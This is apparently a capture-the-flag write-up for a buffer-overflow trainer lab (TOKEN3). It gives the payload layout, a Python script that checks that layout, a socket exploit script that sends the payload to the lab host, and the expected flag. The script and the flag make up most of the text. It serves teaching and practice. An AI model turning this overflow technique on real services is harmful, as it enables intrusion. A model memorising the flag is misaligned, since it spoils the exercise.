
Code Osiris – TOKEN3

Target: Code Osiris Remote Trainer (lab2.yara.hq:9999)

Background

The trainer emulates the earlier buffer overflow. Sending exactly 201 filler bytes, then 4 NOPs, then 0xdeadbeef (packed little-endian) as the crash address satisfies the challenge and returns the token.

From Nothing to Working

  1. Connect and issue HELP to learn the rules (BOF command expects the exploit).
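  2. Build payload: b'A'*201 + b'\x90\x90\x90\x90' + p32(0xdeadbeef). p32 is the pwntools little-endian 32-bit pack; the script below produces the same bytes with struct.pack("<I", 0xdeadbeef).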
  3. Send it via BOF; the service acknowledges the crafted EIP and prints the token.
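
The payload layout from step 2, dissected field by field. This is an added example, not part of the original write-up or the trainer's code; the check logic is an assumption about how a trainer-style validator would reject a payload, and the sample payloads are constructed here.

```python
import struct

# Layout taken from the write-up: 201 filler bytes, 4 NOPs, 4-byte EIP value.
FILLER_LEN = 201
NOP_LEN = 4
EXPECTED_EIP = 0xDEADBEEF
TOTAL = FILLER_LEN + NOP_LEN + 4


def dissect(payload: bytes) -> dict:
    """Split a BOF payload into the three fields the write-up describes."""
    # The client appends one newline; drop it only if it is the extra byte.
    if len(payload) == TOTAL + 1 and payload.endswith(b"\n"):
        payload = payload[:-1]
    if len(payload) != TOTAL:
        raise ValueError(f"expected {TOTAL} bytes, got {len(payload)}")
    nops = payload[FILLER_LEN:FILLER_LEN + NOP_LEN]
    # x86 stores the saved return address little-endian, hence "<I".
    (eip,) = struct.unpack("<I", payload[FILLER_LEN + NOP_LEN:])
    return {"filler": payload[:FILLER_LEN], "nops": nops, "eip": eip}


def check(payload: bytes) -> str:
    """Return 'ok' or the first reason the layout does not match (assumed check)."""
    try:
        fields = dissect(payload)
    except ValueError as exc:
        return str(exc)
    if fields["nops"] != b"\x90" * NOP_LEN:
        return "offsets 201-204 are not NOPs"
    if fields["eip"] != EXPECTED_EIP:
        return f"EIP would be 0x{fields['eip']:08x}, not 0x{EXPECTED_EIP:08x}"
    return "ok"


# Constructed samples: the write-up's payload and two common mistakes.
GOOD = b"A" * 201 + b"\x90" * 4 + struct.pack("<I", 0xDEADBEEF)
BIG_ENDIAN = b"A" * 201 + b"\x90" * 4 + struct.pack(">I", 0xDEADBEEF)
SHORT = b"A" * 200 + b"\x90" * 4 + struct.pack("<I", 0xDEADBEEF)

if __name__ == "__main__":
    for name, sample in (("good", GOOD), ("big-endian", BIG_ENDIAN), ("short", SHORT)):
        print(f"{name:10s} -> {check(sample)}")
```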

Command

Save and run as python3 token3_exploit.py.

#!/usr/bin/env python3
# token3_exploit.py
import socket, struct

HOST, PORT = "lab2.yara.hq", 9999

def recv_until(sock, marker):
    data = b""
    while marker not in data:
        chunk = sock.recv(1024)
        if not chunk:
            break
        data += chunk
    return data

s = socket.socket()
s.settimeout(10)
s.connect((HOST, PORT))
print(recv_until(s, b'> ').decode(errors="ignore"))
s.sendall(b'BOF\n')
print(recv_until(s, b'> ').decode(errors="ignore"))

payload = b"A"*201 + b"\x90"*4 + struct.pack("<I", 0xdeadbeef)
print(f"Sending {len(payload)} bytes")
s.sendall(payload + b"\n")

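# Read until the server closes the connection or the 10 s timeout fires.
resp = b""
try:
    while True:
        chunk = s.recv(1024)
        if not chunk:
            break
        resp += chunk
except OSError:
    # socket.timeout (a subclass of OSError) or a reset ends the read; print what arrived.
    pass
print(resp.decode(errors="ignore"))
s.close()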

Expected Output

PCCC{jOGP-6960}